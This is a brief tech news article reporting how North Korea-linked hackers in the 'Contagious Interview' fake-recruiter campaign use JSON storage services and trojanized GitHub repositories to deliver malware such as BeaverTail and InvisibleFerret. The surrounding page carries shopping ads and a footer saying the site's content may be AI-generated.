LONDON (IT BOLTWISE) – North Korean hackers have developed a new method to use JSON storage services as covert channels for malware attacks. This tactic is part of the so-called ‘Contagious Interview’ campaign, which targets developers and organizations worldwide.
Today’s daily deals at Amazon! ˗ˋˏ$ˎˊ˗
In the world of cyber espionage, North Korean hackers have once again demonstrated their sophistication by turning harmless JSON storage services into covert channels for malware distribution. This strategy is part of the ongoing ‘Contagious Interview’ campaign, which highlights the evolving sophistication of state-sponsored threats targeting developers and organizations worldwide.
North Korea-linked threat actors reportedly use platforms such as JSON Keeper, JSONsilo, and npoint.io. These services, typically used to store and share JSON data, are now being repurposed to host malicious payloads in Trojanized code repositories. The campaign, attributed to the North Korean group Sapphire Sleet, or BlueNoroff, builds on previous methods that used fake job interviews.
Hackers pose as recruiters on platforms like LinkedIn, luring victims with tempting job offers that lead to downloads of infected software disguised as code tests or interview tools. Newer iterations integrate JSON services to evade detection. Attackers use these platforms to store obfuscated JavaScript code that fetches additional levels of malware, including the BeaverTail backdoor and the TsunamiKit loader.
The attack begins with spear-phishing emails or messages that direct targets to GitHub repositories containing seemingly legitimate projects. Hidden within these repos are scripts that retrieve data from JSON services and then execute malicious commands on the victim’s machine. Security experts at Palo Alto Networks’ Unit 42 have observed similar patterns in which North Korean actors chain multiple payloads. This layered approach complicates detection and enables persistence through data exfiltration tools like InvisibleFerret.
Order an Amazon credit card without an annual fee with a credit limit of 2,000 euros!
Bestseller No. 1 ᵃ⤻ᶻ “KI Gadgets”
Bestseller No. 2 ᵃ⤻ᶻ “KI Gadgets”
Bestseller No. 3 ᵃ⤻ᶻ “KI Gadgets”
Bestseller No. 4 ᵃ⤻ᶻ «KI Gadgets»
Bestseller No. 5 ᵃ⤻ᶻ “KI Gadgets”
Please send any additions and information to the editorial team by email to de-info[at]it-boltwise.de. Since we cannot rule out AI hallucinations, which rarely occur with AI-generated news and content, we ask you to contact us via email and inform us in the event of false statements or misinformation. Please don’t forget to include the article headline in the email: “North Korean hackers use JSON services for covert malware attacks”.